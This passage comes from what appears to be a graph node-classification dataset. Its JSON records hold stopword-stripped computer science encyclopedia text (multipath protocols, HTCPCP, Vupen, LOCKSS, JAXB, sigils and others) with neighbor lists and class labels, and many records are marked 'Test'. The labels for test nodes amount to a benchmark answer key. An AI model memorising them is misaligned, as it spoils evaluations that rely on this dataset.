sctp reliable in-order datagram stream transport protocol originally intended telecommunication signaling supports concurrent use multiple access links allows application influence access interface selections datagram stream basis also supports mobility via access renegotiation hence sctp also transport layer solution offers type 3 flow granularity concurrency flow scheduling control multipath tcp also fully supports mobility fashion similar multipath tcp within ip multimedia subsystem ims architecture session initiation protocol sip support concurrent use multiple contact ip addresses registration one ims user agents allows creation multiple ims signaling paths signaling paths signaling messages carry session description protocol sdp messaging negotiate media streams sdp allows re- negotiation streams one media session multiple paths turn enables application layer multipath transport point view ims therefore offer application layer multipath support flow granularity concurrent access multipath extension real-time transport protocol rtp currently discussion within ietf multipath rtp offer flow granularity concurrent access mobility via ims sdp signaling rtp control protocol ietf currently developing quic protocol integrates features traditionally found tcp tls http protocols thanks flexibility extensibility quic possible extend support multiple paths address use cases multipath tcp first design multipath quic proposed implemented evaluated session layer mobile access router project experimented 2003 aggregation multiple wireless accesses heterogeneous technologies transparently balancing traffic response perceived performance parallel access schemes used accelerate transfers taking advantage http range requests initiate connections multiple servers replicated content equivalent multipath tcp involve application layer limited content known size",
    "neighbors": [
      10242,
      10755,
      9732,
      3847,
      649,
      9868,
      3218,
      275,
      9365,
      10005,
      11413,
      5402,
      5531,
      3742,
      10271,
      9380,
      2085,
      9381,
      3751,
      3752,
      10924,
      562,
      2996,
      9909,
      6651,
      1977,
      5178,
      10171,
      3133,
      3006,
      4797,
      5181,
      5437,
      7364,
      2887,
      8265,
      2509,
      4687,
      5843,
      2904,
      5469,
      5470,
      5471,
      5472,
      10341,
      10344,
      11112,
      367,
      8432,
      5371,
      4095
    ],
    "mask": "Test"
  },
  {
    "node_id": 6319,
    "label": 5,
    "text": "Hyper_Text_Coffee_Pot_Control_Protocol:hyper text coffee pot control protocol hyper text coffee pot control protocol htcpcp facetious communication protocol controlling monitoring diagnosing coffee pots specified rfc 2324 published 1 april 1998 april fools day rfc part april fools prank extension htcpcp-tea published rfc 7168 1 april 2014 support brewing teas also april fools day rfc rfc 2324 written larry masinter describes satire saying serious purpose – identifies many ways http extended inappropriately wording protocol made clear entirely serious example notes strong dark rich requirement protocol designed espressoly sic brewing coffee despite joking nature origins perhaps protocol remained minor presence online editor emacs includes fully functional client side implementation number bug reports exist complaining mozilla lack support protocol ten years publication htcpcp web-controlled coffee consortium wc3 published first draft htcpcp vocabulary rdf parody world wide web consortium w3c http vocabulary rdf april 1 2014 rfc 7168 extended htcpcp fully handle teapots htcpcp extension http htcpcp requests identified uniform resource identifier uri scheme codice_1 corresponding word 29 listed languages contain several additions http methods also defines two error responses 5 august 2017 mark nottingham chairman ietf httpbis working group called removal status code 418 'm teapot node.js platform code implemented reference original 418 'm teapot established hyper text coffee pot control protocol 6 august 2017 nottingham requested references 418 'm teapot removed programming language go subsequently python requests asp.net httpabstractions library well response 15 year old developer shane brunswick created website save418.com established save 418 movement asserting references 418 'm teapot different projects serve reminder underlying processes computers still made humans brunswick site went viral hours following publishing garnering thousands upvotes social platform reddit causing mass adoption save418 twitter hashtag introduced site heeding public outcry node.js go python requests asp.net httpabstractions library decided removing 418 'm teapot respective projects unanimous support aforementioned projects general public prompted mark nottingham begin process 418 marked reserved http status code ensuring 418 replaced official status code foreseeable future",
    "neighbors": [
      10242,
      5251,
      3592,
      2571,
      5520,
      3218,
      3474,
      8852,
      11413,
      1435,
      10269,
      3742,
      1694,
      35,
      10924,
      6319,
      562,
      11444,
      6456,
      6330,
      4797,
      3006,
      4158,
      64,
      9919,
      7364,
      2887,
      9167,
      5469,
      5470,
      10333,
      10341,
      10727,
      10344,
      11112,
      5482,
      8554,
      9834,
      5102,
      5744,
      8432,
      7795,
      11509,
      3191,
      6651,
      124
    ],
    "mask": "Test"
  },
  {
    "node_id": 6320,
    "label": 9,
    "text": "Gul_Agha_(computer_scientist):gul agha computer scientist gul agha گُل آغا professor computer science university illinois urbana-champaign director open systems laboratory known work actor model concurrent computation also editor-in-chief acm computing surveys 1999 2007 agha completed b.s honors california institute technology year 1977 received ph.d. computer communication science university michigan 1986 supervision john holland however much doctoral research carried carl hewitt message-passing semantics group massachusetts institute technology mit agha dissertation published mit press actors model concurrent computation distributed systems book according acm guide computing literature cited 3000 times agha born completed early schooling sindh pakistan received b.s honors california institute technology 1977 agha enjoys blues music vegan pacifist three daughters lives wife jennifer s. cole illinois agha became fellow institute electrical electronics engineers ieee 2002 also golden core member ieee computer society recipient ieee computer society meritorious service award international lecturer acm 1992 1997 agha elected acm fellow 2018 research concurrent programming formal methods specifically actor model",
    "neighbors": [
      9224,
      10102,
      679
    ],
    "mask": "Test"
  },
  {
    "node_id": 6321,
    "label": 2,
    "text": "Helix_Netroom:helix netroom netroom dos memory manager produced helix software company 1990s introduced august 1990 netroom originally titled lan memory manager version 1.0 netroom re-packaged version helix headroom headroom network extensions bundled together targeted network users netroom loaded network drivers virtual machine created using expanded memory page frame netroom allowed virtual machine run multitasked background process netroom included support novell netware banyan vines lan manager networks netroom originally available multi-user packs starting four user license helix introduced version 1.10 netroom january 1991 single-user license version included support microsoft windows 3.0 added integrated 286 386 expanded memory manager netroom 286/386 memory manager provided access expanded memory extended memory intel 80386 newer systems well intel 80286 systems based chips technologies neat chipset june 1991 netroom v2.0 added ms-dos 5 compatibility automatic setup configuration tool named customize netroom 2.0 continued focus virtual machine task-switching primary memory management technology january 1992 netroom v2.1 added quantum memory management feature could relocate system video bios high memory area 1992 helix licensed technology netroom 2.1 microsoft technology incorporated emm386 memmaker programs ms-dos 6 released march 1993 concurrently release ms-dos 6 helix released netroom v3.0 included helix cloaking technology netroom 3 contained variety cloaked utilities including system video bios licensed award software animated screen saver disk cache ram drive final version netroom v3.04 released late 1994 included compatibility windows 95 cloaking driver continued basis multimedia cloaking multimedia stacker products released 1994 1995",
    "neighbors": [
      548,
      1515,
      6797,
      8301,
      9166,
      8241,
      8115,
      3477,
      11101
    ],
    "mask": "Test"
  },
  {
    "node_id": 6322,
    "label": 3,
    "text": "JavaStation:javastation javastation network computer nc developed sun microsystems 1996 2000 intended run java applications hardware based design sun sparcstation series successful line unix workstations javastation nc lacks hard drive floppy cd-rom drive also differs sun systems ps/2 keyboard mouse interfaces vga monitor connector several models javastation produced pre-production variants produced small numbers production models comprised models produced prototypes limited numbers included addition sun envisioned third-generation super javastation krups javachip co-processor native java bytecode execution n't appear produced javastation concept superseded sun ray series thin client terminals javastation comes javaos flash memory also possible install linux netbsd javastation",
    "neighbors": [
      3328,
      9090,
      9731,
      1801,
      4235,
      1809,
      4241,
      2710,
      1818,
      8863,
      7072,
      9343,
      8994,
      5375,
      1316,
      10789,
      1707,
      2731,
      5677,
      3247,
      2871,
      823,
      4664,
      9657,
      4285,
      6464,
      7104,
      6338,
      9665,
      10436,
      8007,
      1480,
      2895,
      3919,
      597,
      3285,
      10327,
      10200,
      2269,
      5471,
      4960,
      10337,
      9955,
      11363,
      7270,
      11626,
      7148,
      7022,
      5872,
      5233,
      6129,
      8179,
      11636,
      9333,
      631,
      11129,
      1788,
      1399
    ],
    "mask": "Test"
  },
  {
    "node_id": 6323,
    "label": 4,
    "text": "Canadian_Cyber_Incident_Response_Centre:canadian cyber incident response centre canadian cyber incident response centre ccirc ccric government canada program responsible monitoring threats coordinating national response cyber security incident focus protection national critical infrastructure cyber incidents housed within ministry public safety ccirc works within public safety canada partnership municipalities territories provinces private sector organizations international counterparts also coordinates national response serious cyber security incident",
    "neighbors": [
      9833,
      4435,
      612,
      2558
    ],
    "mask": "Test"
  },
  {
    "node_id": 6324,
    "label": 4,
    "text": "Copy-evident_document:copy-evident document copy-evident documents features make detectable copy original security printing various methods void pantograph used create patterns hard copy exactly copied inexactly produces easily detectable image include halftone screens affected copying process fine line patterns different directions differently affected copying hence produce mark metallic inks causing diffraction reflection copy-evident computer image files also possible example embedding high-frequency pattern jpeg image imperceptible produces obvious message re-compressed different quality factor forms paper watermarking digital watermarking regarded copy-evidence although detecting document file copied typically requires special inspection tools software example 3d printed objects equipped marks genuinity identified using measurement device hard deduce sample objects copies lack marks",
    "neighbors": [
      4617,
      4882,
      10163
    ],
    "mask": "Validation"
  },
  {
    "node_id": 6325,
    "label": 2,
    "text": "System_Generation_(OS):system generation os system generation sysgen two-stage process installing updating os/360 os/vs1 os/vs2 svs os/vs2 mvs chargeable systems derived similar processes e.g. dos/360 article cover also details changed releases os/360 many details carry later systems several reasons ibm provided system generation process rather simply providing mechanism restore system tape disk system/360 self-identifying i/o devices customer could request installation i/o devices arbitrary addresses result ibm provide mechanism customer define i/o configuration os/360 also os/360 supported several different options ibm needed way customer select code appropriate options needed particular installation sysgen process runs series jobs control operating system new installations ibm provides complete pre-configured driver system intended preparing running sysgen production use prior running sysgen customer must initialize set distribution volumes restore set distribution libraries tape volumes libraries include data sysgen process copy target libraries input utilities used sysgen process macro definitions used sysgen process load modules sysgen process include linking load modules target libraries stage 1 compilation sequence assembler macro instructions describing configuration installed updated assembler actually compile object code instead compiles series punch pseudo-ops order generate job stream stage 2 ibm changed nomenclature os/360 options also changed sysgen macro definitions use newer names options type keyword ctrlprog macro stage 1 input specifies type control program release 13 old terms sss mss mps replaced pcp mft mvt later m65mp type variation mvt scheduler macro stage 1 input specifies type scheduler release 13 still used values sequential priority subsequently replaced values used type keyword ctrlprog macro types generate macro sysgen input several types mvt either type=mvt type=m65mp tso tsogen macro plays role generate either macros analyzes options specified previous macro calls punches stage 2 job stream stage 2 jobstream uses variety utilities including assembler linkage editor process obsolete initially replaced use smp/e iocp mvscp later smp/e hardware configuration definition hcd",
    "neighbors": [
      10883,
      6148,
      9355,
      10508,
      7053,
      9619,
      8213,
      11673,
      6557,
      3359,
      10273,
      6442,
      7983,
      9139,
      573,
      1219,
      964,
      6342,
      8136,
      477,
      863,
      3938,
      5603,
      868,
      3429,
      5220,
      9829,
      5363,
      375,
      2168,
      3323,
      2172,
      2813
    ],
    "mask": "Test"
  },
  {
    "node_id": 6326,
    "label": 4,
    "text": "Vupen:vupen vupen security french information security company founded 2004 based montpellier u.s. branch based annapolis maryland specialty discovering zero-day vulnerabilities software major vendors order sell law enforcement intelligence agencies use achieve defensive offensive cyber-operations vupen ceased trading 2015 founders created new company zerodium 2011 2012 2013 2014 vupen first prize hacking contest pwn2own notably 2012 exploiting bug google chrome decision reveal details vulnerability google rather sell controversial unlike 2012 pwn2own 2014 vupen decided reveal affected vendors including google exploits technical details regarding discovered vulnerabilities led release various security updates adobe microsoft apple mozilla google address reported flaws according french registrar companies vupen earned net profit €1,283,000 2014 years ago vupen still providing information vulnerabilities software free decided earn money services software companies chance said vupen-founder chaouki bekrar according article late 15 september 2013 revealed nsa client vupen subscription exploit service 9 november 2014 german magazine der spiegel reported german information security agency bsi tasked protection federal government networks also client vupen 22 july 2015 revealed vupen provided exploits hacking team 2010 2011 5 may 2015 vupen headquarters filed documents ceasing operations 23 july 2015 vupen founders launched new us cybersecurity company named zerodium different business model acquires exclusive zero-day discoveries independent researchers reports along protective measures security recommendations corporate government clients",
    "neighbors": [
      5024,
      5636,
      3944,
      4813,
      9424,
      9082,
      4956,
      5373
    ],
    "mask": "None"
  },
  {
    "node_id": 6327,
    "label": 7,
    "text": "Green_House_Data:green house data green house data data center managed services provider headquartered cheyenne wyoming united states cheyenne home campus 45,000 square feet data center space well administrative technical support offices company additional data center locations washington colorado oregon georgia texas new jersey new york sales marketing offices laramie denver colorado 2019 company also operates consulting focused office toronto ontario 2007 three friends hatched idea data center powered exclusively renewable energy coffee soon began process retrofitting former office building provision 3000 square feet colocation space march 2012 green house data doubled footprint cheyenne location added cloud hosting products expanded footprint west coast december 2013 east coast expansion announced august 2013 company broken ground new facility cheyenne second cheyenne location officially opened july 30 2014 september 2014 1547 critical systems realty green house data announced company would anchor tenant redevelopment 1 ramland road orangeburg new york april 2015 company acquired fibercloud seattle washington based provider colocation cloud hosting data center services acquisition green house data added three data centers washington state well nearly 20 employees several hundred customers april 2017 company acquired cirracore cloud-focused infrastructure provider based atlanta georgia november 2017 company acquired ajubeo cloud hosting service provider based denver green house data announced merger via acquisition infront consulting group may 2018 expanding operations toronto las vegas well satellite sites adding 30 consulting staff focusing microsoft azure cloud automation consulting company part new surge data center construction cheyenne region across rocky mountains cheyenne ranked top 5 location data centers microsoft echostar national center atmospheric research operating facilities city addition green house data facility orangeburg represents entry rockland county market beginning emerge new data center cluster home facilities operated bloomberg l.p. verizon everett bellingham washington represent markets i-5 corridor historically underserved whole data center industry highly criticized heavy electrical use recent years actively tried reduce power consumption improving facility design increasing server virtualization key element business model green house data purchases renewable energy credits recs wind power documents purchases epa green power partnership 2013 green house data part epa leadership club sustainable power purchases common measure data center power consumption power usage effectiveness often abbreviated pue beginning 2014 green house data first company participate wyorecs first renewable energy credit program based wyoming april 2015 green house data joined epa top 30 tech telecom list largest green power users retiring 8 million kilowatt-hours kwh green power annually 2017 company moved 5 places list retiring 20,270,000 kwhs npr things considered called green house data energy efficiency obsession july 2011 company cloud colocation facilities achieved ssae 16 type ii compliance additionally 2012 green house data achieved hipaa compliance green house data operates total seven data center facilities five geographic regions cloud colocation data centers atlanta ga cheyenne wy seattle wa bellingham wa cloud data centers dallas tx denver co orangeburg ny location carrier neutral fully compliant hipaa ssae 16 type ii standards comes guaranteed uptime service level agreements march 2016 company announced hear human technical support service guarantee fortune called characteristic boutique cloud seattle facility located within westin building 3rd largest carrier hotel united states westin building data center consists 18th 19th 32nd floors participation seattle internet exchange green house data became one select group azure expert msps independently certified audit demonstrates exceptional proficiency abilities within microsoft azure ecosystem april 2019 late 2017 green house data acquired assuritive disaster recovery service provider november 2017 green house data acquired ajubeo denver-based cloud hosting service provider bringing company total cloud node locations ten earlier year green house data acquired cirracore atlanta-based provider enterprise cloud services expanding company reach southeast united states green house data acquired fibercloud west coast data center company april 2015 gaining three washington facilities seattle everett bellingham february 2015 green house data recognized top 500 msp crn magazine second consecutive year october 2014 green house data recognized top 100 cloud services provider talkin cloud making list second consecutive time february 2014 green house data recognized top 500 managed service provider crn magazine 2014 green house data became first b corp wyoming green house data cto cortney thompson interviewed part marketplace radio piece wyoming public media covering government departments moving cloud services data centers august 2014 state wyoming announced first anchor tenant green house data second cheyenne facility",
    "neighbors": [
      4194,
      8471,
      1935
    ],
    "mask": "None"
  },
  {
    "node_id": 6328,
    "label": 8,
    "text": "Java_Web_Services_Development_Pack:java web services development pack java web services development pack jwsdp free software development kit sdk developing web services web applications java applications newest technologies java oracle replaced jwsdp glassfish components jwsdp part glassfish wsit several java se 6 mustang source available open source initiative-approved cddl license components apis available jwsdp 1.6 starting jwsdp 1.6 jax-rpc jax-ws implementations support fast infoset standard binary encoding xml infoset earlier versions jwsdp also included many java implementations web services xml processors support java standards support standards non-standard features related technologies include",
    "neighbors": [
      11105,
      4740,
      10020,
      10526,
      1128,
      5677,
      4688,
      3954,
      1851,
      7261,
      6334,
      4959
    ],
    "mask": "Validation"
  },
  {
    "node_id": 6329,
    "label": 2,
    "text": "VERSAdos:versados versados operating system dating back early 1980s use motorola 68000 development system called exormacs featured versabus array option cards typically connected cdc phoenix disk drives running one four 14-inch platters exormacs used emulate 680xx processor in-circuit speeding development 680xx based systems also hosted several compilers assemblers versados exormacs produced motorola microsystems division versados real-time multi-user operating system follow product single user mdos ran 6800 development system called exorciser systems features harness cpu socket compatible connector modula 2 compiler ported versados following list commands utilities supported versados",
    "neighbors": [
      2179,
      10499,
      10883,
      394,
      1147,
      1804,
      3978,
      6797,
      273,
      7057,
      6675,
      7187,
      11539,
      9366,
      11667,
      6296,
      25,
      8729,
      10776,
      8092,
      4637,
      6558,
      7325,
      9887,
      10016,
      9762,
      421,
      5158,
      10235,
      2345,
      6187,
      7983,
      3248,
      7217,
      11184,
      6837,
      823,
      9784,
      4409,
      10809,
      6075,
      7483,
      6078,
      9151,
      576,
      5569,
      11075,
      8388,
      4423,
      8136,
      9932,
      5840,
      5457,
      11601,
      1750,
      7382,
      8410,
      10333,
      10590,
      2399,
      97,
      1253,
      7269,
      8551,
      8298,
      1260,
      6128,
      5363,
      5492,
      5619,
      7285,
      9335,
      2168,
      2811,
      3197,
      1150
    ],
    "mask": "Test"
  },
  {
    "node_id": 6330,
    "label": 5,
    "text": "Acct_(protocol):acct protocol acct uri scheme proposed internet standard published internet engineering task force defined purpose scheme identify rather interact user accounts hosted service provider scheme differs dns name specifies service provider acct uri intended single uri scheme would return information person possibly thing holds account given domain",
    "neighbors": [
      10242,
      5251,
      3218,
      11674,
      10269,
      35,
      6319,
      53,
      10938,
      4797,
      7364,
      2887,
      9167,
      10452,
      2901,
      119,
      479,
      6629,
      10341,
      10727,
      11112,
      5482,
      9834,
      3052,
      11509,
      3191,
      6651
    ],
    "mask": "None"
  },
  {
    "node_id": 6331,
    "label": 7,
    "text": "LOCKSS:lockss lockss lots copies keep stuff safe project auspices stanford university peer-to-peer network develops supports open source system allowing libraries collect preserve provide readers access material published web main goal digital preservation system attempts replicate way libraries material published paper originally designed scholarly journals also used range materials examples include solinet project preserve theses dissertations eight universities us government documents metaarchive cooperative program preserving at-risk digital archival collections including electronic theses dissertations etds newspapers photograph collections audio-visual collections similar project called clockss controlled lockss tax-exempt 501 c 3 not-for-profit organization governed board directors made librarians publishers clockss runs lockss technology rutgers university libraries webpage comparing lockss clockss portico traditionally academic libraries retained issues scholarly journals either individually collaboratively providing readers access content received even publisher ceased subscription canceled digital age libraries often subscribe journals available digitally internet although convenient patron access model digital subscriptions allow libraries retain copy journal publisher ceases publish library cancels subscription publisher website day content paid longer available lockss system allows library permission publisher collect preserve disseminate patrons copy materials subscribed well open access material perhaps published creative commons license library system collects copy using specialized web crawler verifies publisher granted suitable permission system format-agnostic collecting whatever formats publisher delivers via http libraries collected material cooperate peer-to-peer network ensure preservation peers network vote cryptographic hash functions preserved content nonce peer outvoted regards copy damaged repairs publisher peers lockss license used publishers allows library readers access copy allow similar access libraries unaffiliated readers system support file sharing request library may supply another library content effect repair requesting library proved past good copy voting majority reader browser longer supports format copy collected format migration process convert current format limits use may made preserved copies copyright material effective persuading copyright owners grant necessary permission lockss approach selective collection permission publisher distributed storage restricted dissemination contrasts example internet archive approach omnivorous collection without permission publisher centralized storage unrestricted dissemination lockss system far smaller preserve subscription materials internet archive access since library administers lockss peer maintains copy preserved material since libraries worldwide see list participating libraries system provides much higher degree replication usual fault-tolerant system voting process makes use high degree replication eliminate need backups off-line media provide robust defenses attacks aimed corrupting preserved content addition preserving access libraries traditionally made difficult rewrite suppress printed material existence indeterminate large number identical copies somewhat tamper-resistant medium many independent administrations meant attempts alter remove copies published work would likely fail detected web publishing based single copy single administration provides none safeguards subversion web publishing therefore amenable tool rewriting history preserving many copies diverse administration automatically auditing copies intervals future publisher copy alerting libraries changes detected lockss system attempts restore many safeguards digital world publication prior implementing lockss system questions need considered carefully order make sure content verified evaluated auditable users user must ask questions procedures methods system evaluated disaster preparedness program questions enable user evaluate system create successful maintenance plan materials enable system reinforced carefully evaluated support structure source code entire lockss system carries bsd-style open-source licenses available github lockss trademark stanford university",
    "neighbors": [
      8640,
      3366,
      9079,
      113,
      11221,
      7575,
      1049,
      8671
    ],
    "mask": "Validation"
  },
  {
    "node_id": 6332,
    "label": 9,
    "text": "Type_variable:type variable type theory programming languages type variable mathematical variable ranging types even programming languages allow mutable variables type variable remains abstraction sense correspond memory locations programming languages support parametric polymorphism make use universally quantified type variables languages support existential types make use existentially quantified type variables example following ocaml code defines polymorphic identity function universally quantified type printed interpreter second line mathematical notation type function codice_1 formula_1 formula_2 type variable",
    "neighbors": [
      5585,
      5885,
      8262
    ],
    "mask": "None"
  },
  {
    "node_id": 6333,
    "label": 2,
    "text": "MirOS_BSD:miros bsd miros bsd originally called mirbsd discontinued free open source operating system started fork openbsd 3.1 august 2002 intended maintain security openbsd better support european localisation since also incorporated code free bsd descendants including netbsd microbsd freebsd code miros bsd also incorporated ekkobsd ekkobsd ceased exist artwork code developers ended working miros bsd unlike three major bsd distributions miros bsd supports x86 sparc architectures one project goals able port miros userland run linux kernel hence deprecation mirbsd name favour miros web page os project active 2019 last update os years ago e.g font released miros bsd originated openbsd-current-mirabilos openbsd patchkit soon grew differences opinion openbsd project leader theo de raadt thorsten glaser despite forking miros bsd synchronised ongoing development openbsd thus inheriting good security history well netbsd bsd flavours one goal provide faster integration cycle new features software openbsd according developers controversial decisions often made differently openbsd instance wo n't support smp miros also tolerant software inclusion policy end result hopefully refined bsd experience another goal miros bsd create modular base bsd system similar debian miros linux linux kernel bsd userland discussed developers sometime 2004 materialised important differences openbsd aside cooperating bsds submitting patches upstream software authors synergy effects freewrt active cooperation grml inclusion technical areas projects debian also fed mirsoftware mirports derivative openbsd ports tree developed benny siegert mirports use package tools openbsd written perl continues maintain previous c-based tools new features in-place package upgrades installing mirports instance non-root user unlike openbsd ports mirports tied specific os versions even stable releases using newest version recommended mirlibtool modified version gnu libtool 1.5 installed mirports build shared libraries portable way multiple platforms supported box following miros bsd policy faster software availability user many ports removed political reasons openbsd e.g djb software flash plugin kept mirports continue used mirports intended place unofficial rejected openbsd ports",
    "neighbors": [
      7552,
      8582,
      5397,
      8725,
      2861,
      11565,
      7983,
      11442,
      823,
      7483,
      6333,
      10817,
      9671,
      5067,
      11481,
      5596,
      9320,
      499,
      5363,
      1399,
      11129,
      2811,
      2045,
      1150
    ],
    "mask": "None"
  },
  {
    "node_id": 6334,
    "label": 9,
    "text": "Java_Architecture_for_XML_Binding:java architecture xml binding java architecture xml binding jaxb software framework allows java developers map java classes xml representations jaxb provides two main features ability marshal java objects xml inverse i.e unmarshal xml back java objects words jaxb allows storing retrieving data memory xml format without need implement specific set xml loading saving routines program class structure similar codice_1 codice_2 .net framework jaxb particularly useful specification complex changing case regularly changing xml schema definitions keep synchronised java definitions time consuming error-prone jaxb part java se platform one apis java ee platform part java web services development pack jwsdp also one foundations wsit java 11 jaxb removed java se platform moved jakarta ee project details see jep 320 jaxb 1.0 developed java community process jsr 31 2006 jaxb 2.0 released jsr 222 maintenance release 2 released december 2009 reference implementations specifications available cddl open source license java.net tool xjc used convert xml schema schema file types java 1.6 relax ng xml dtd wsdl supported experimentally class representations classes marked using annotations javax.xml.bind.annotation namespace example xmlrootelement xmlelement xml list sequences represented attributes type java.util.list marshallers unmarshallers created instance jaxbcontext addition jaxb includes schemagen tool essentially perform inverse xjc creating xml schema set annotated classes table lists mappings xml schema xsd data types java data types jaxb",
    "neighbors": [
      9988,
      8070,
      3341,
      3853,
      10526,
      10020,
      5677,
      6067,
      6328,
      2106,
      3517,
      3518,
      11582,
      3008,
      1095,
      3278,
      3920,
      10193,
      4959,
      479,
      4960,
      3558,
      1128,
      3560,
      9834,
      3954,
      3966,
      3573,
      2556,
      3710
    ],
    "mask": "None"
  },
  {
    "node_id": 6335,
    "label": 9,
    "text": "Sigil_(computer_programming):sigil computer programming computer programming sigil symbol affixed variable name showing variable datatype scope usually prefix codice_1 codice_2 sigil sigil latin sigillum meaning little sign means sign image supposedly magical power 1999 philip gwyn adopted term mean funny character front perl variable use sigils popularized basic programming language best known example sigil basic dollar sign codice_2 appended names strings many basic dialects use sigils like codice_4 denote integers floating point numbers precision sometimes types well larry wall adopted shell scripting use sigils perl programming language perl sigils specify fine-grained data-types like strings integers general categories scalars using prefixed codice_2 arrays using codice_6 hashes using codice_4 subroutines using codice_8 perl 6 introduces secondary sigils twigils indicate scope variables prominent examples twigils perl 6 include codice_9 used self-declared formal parameters placeholder variables codice_10 used object attribute accessors i.e. instance variables clips scalar variables prefixed codice_11 sigil multifield i.e 1-level list variables prefixed codice_12 common lisp special variables dynamic scope typically surrounded codice_13 dubbed “ earmuff convention ” convention enforced language adopts practice e.g. *standard-output* similarly programmers surround constants codice_14 cycl variables prefixed codice_11 sigil similarly constant names prefixed codice_16 pronounced hash-dollar elixir string sigils provided via codice_17 symbol mapper aka bis named variables prefixed suffixed strings character values require quotes mirc script identifiers codice_2 sigil variables codice_4 prefixed regardless local global variables data type binary variables prefixed codice_8 mumps programming language codice_2 precedes intrinsic function names 'special variable names built-in variables accessing execution state codice_22 precedes non-standard intrinsic function names codice_23 precedes extrinsic function names routines used procedures subroutines functions global variables database storage prefixed caret last global variable subtree may referenced indirectly caret last subscript referred naked reference system-wide routines global variables stored certain shared database prefixed referred percent routines percent globals objective-c string literals preceded codice_6 instances object type codice_25 since clang v3.1 llvm v4.0 codice_26 codice_27 codice_28 prefix-codice_6 also used keywords codice_30 codice_31 codice_32 express structure class definitions within class declarations definitions well prefix codice_33 used indicate member methods variables prefix codice_14 indicates class elements php language largely inspired perl codice_2 precedes variable name names prefixed considered constants functions class names interface trait names share namespace classes pilot uses codice_2 buffers string variables codice_37 integer variables codice_13 program labels python uses codice_6 prefix denote decorator ruby ordinary variables lack sigils codice_2 prefixed global variables codice_6 prefixed instance variables codice_42 prefixed class variables ruby also uses strictly conventional suffix sigils codice_11 indicates predicate method returning usually boolean value codice_44 indicates method may potentially unexpected effect needs handled care scheme convention names procedures always return boolean value usually end codice_11 likewise names procedures store values parts previously allocated scheme objects pairs vectors strings usually end codice_44 standard ml uses prefix sigil codice_47 variable refers type sigil doubled refers type equality defined codice_47 character may also appear within end variable case special meaning transact-sql codice_6 precedes local variable parameter name system variables known global variables distinguished codice_42 prefix windows powershell partly inspired unix shells perl variable names prefixed codice_2 sigil xslt variables parameters leading codice_2 sigil use although defined codice_53 codice_54 codice_55 attribute sigil included related xslt xquery uses codice_2 sigil form definition use mel variable names prefixed codice_2 distinguish functions commands identifiers unix shell scripting utilities makefiles codice_2 unary operator translates name variable contents may seem similar sigil properly unary operator lexical indirection similar codice_13 dereference operator pointers c noticeable fact dollar sign omitted assigning variable fortran sigils used variables starting letters j k l n integers default fortran documentation refers implicit typing though explicit typing always available allow variable declared type choice range i–n conforms traditional mathematical naming conventions various programming languages including prolog haskell ruby go treat identifiers beginning capital letter differently identifiers beginning small letter practice related use sigils actually form stropping use many languages microsoft ’ .net common language infrastructure cli requires way use variables different language may keywords calling language sometimes done prefixes c variable names may prefixed codice_6 mainly used allow use variable names would otherwise conflict keywords achieved vb.net enclosing name square brackets codice_61 codice_6 prefix also applied string literals see literal affixes related sigils hungarian notation convention variable-naming specifies variable type attaching certain alphabetic prefixes variable name unlike sigils however hungarian notation provides information compiler explicit types must redundantly specified variables unless using language type inference standard compilers enforce use prefixes permits omission also makes code prone confusion due accidental erroneous use sigils applied names identifiers similar prefixes suffixes applied literals notably integer literals string literals specifying either literal evaluated data type example codice_63 evaluates value 16 unsigned long long integer c++ codice_64 prefix indicates hexadecimal suffix codice_65 indicates unsigned long long similarly prefixes often used indicate raw string codice_66 python represents string value codice_67 escaped string would written codice_68 affects semantics value literal rather syntax semantics identifier name neither stropping identifier syntax sigil identifier semantics syntactically similar compare java annotations override deprecated cases syntax used distinct purposes cause confusion example c codice_6 prefix used either stropping allow reserved words used identifiers prefix literal indicate raw string case neither use sigil affects syntax identifiers semantics literals semantics identifiers",
    "neighbors": [
      1152,
      5760,
      5635,
      8582,
      2062,
      655,
      9103,
      5521,
      10510,
      10387,
      1435,
      9245,
      8990,
      3876,
      7076,
      6313,
      11442,
      1973,
      6847,
      6596,
      8644,
      5961,
      11610,
      10075,
      10083,
      8421,
      10470,
      8554,
      8556,
      2029,
      3573,
      502,
      6775,
      2936,
      2556,
      2045
    ],
    "mask": "Test"
  },
  {
    "node_id": 6336,
    "label": 0,
    "text": "Katz's_back-off_model:katz back-off model katz back-off generative n -gram language model estimates conditional probability word given history n -gram accomplishes estimation backing progressively shorter history models certain conditions model reliable information given history used provide better results model introduced 1987 slava m. katz prior n-gram language models constructed training individual models different n-gram orders using maximum likelihood estimation interpolating together equation katz back-off model essentially means n -gram seen k times training conditional probability word given history proportional maximum likelihood estimate n -gram otherwise conditional probability equal back-off conditional probability n − 1 -gram difficult part determining values k α formula_2 least important parameters usually chosen 0 however empirical testing may find better values k. formula_3 typically amount discounting found good–turing estimation words good–turing estimates formula_4 formula_5 formula_6 compute formula_7 useful first define quantity β left-over probability mass n − 1 -gram back-off weight α computed follows formula applies data n − 1 -gram algorithm skips n-1 entirely uses katz estimate n-2 n-gram data found model generally works well practice fails circumstances example suppose bigram b unigram c common trigram b c never seen since b c common may significant due chance b c never seen perhaps allowed rules grammar instead assigning appropriate value 0 method back bigram estimate p c b may high",
    "neighbors": [
      1044,
      10557,
      3998
    ],
    "mask": "Train"
  },
  {
    "node_id": 6337,
    "label": 4,
    "text": "High_Assurance_Guard:high assurance guard high assurance guard hag multilevel security computer device used communicate different security domains niprnet siprnet hag one example controlled interface security levels hags approved common criteria process hag runs multiple virtual machines physical machines one subsystems lower classification one subsystems higher classification hardware runs type knowledge management software examines data coming higher classification subsystem rejects data classified higher lower classification general hag allows lower classified data resides higher classified system moved another lower classified system example us would allow unclassified information residing secret classified system moved another unclassified system various rules filters hag ensures data lower classification allows transfer application layer hag runs evaluated mandatory integrity policy provides sensitive files data applications protection inadvertent disclosure operating system level hag must multi-level kernel ensures sensitive information processes devices stored running system different sensitivity levels intermingle violation system mandatory security model systems certified via common criteria depending classification system may require common criteria evaluated assurance level eal 3 higher examples us evaluation eal 5 eal 5+ eal 5 augmented higher required export secret domain unclassified domain manufacturers may use trusted computer system trusted applications high assurance equivalent term hag hag mostly used email dms environments certain organizations may unclassified network access need send message organization secret network access hag provides ability",
    "neighbors": [
      10170,
      8904,
      11470,
      2426,
      3930,
      6110
    ],
    "mask": "None"
  },
  {
    "node_id": 6338,
    "label": 8,
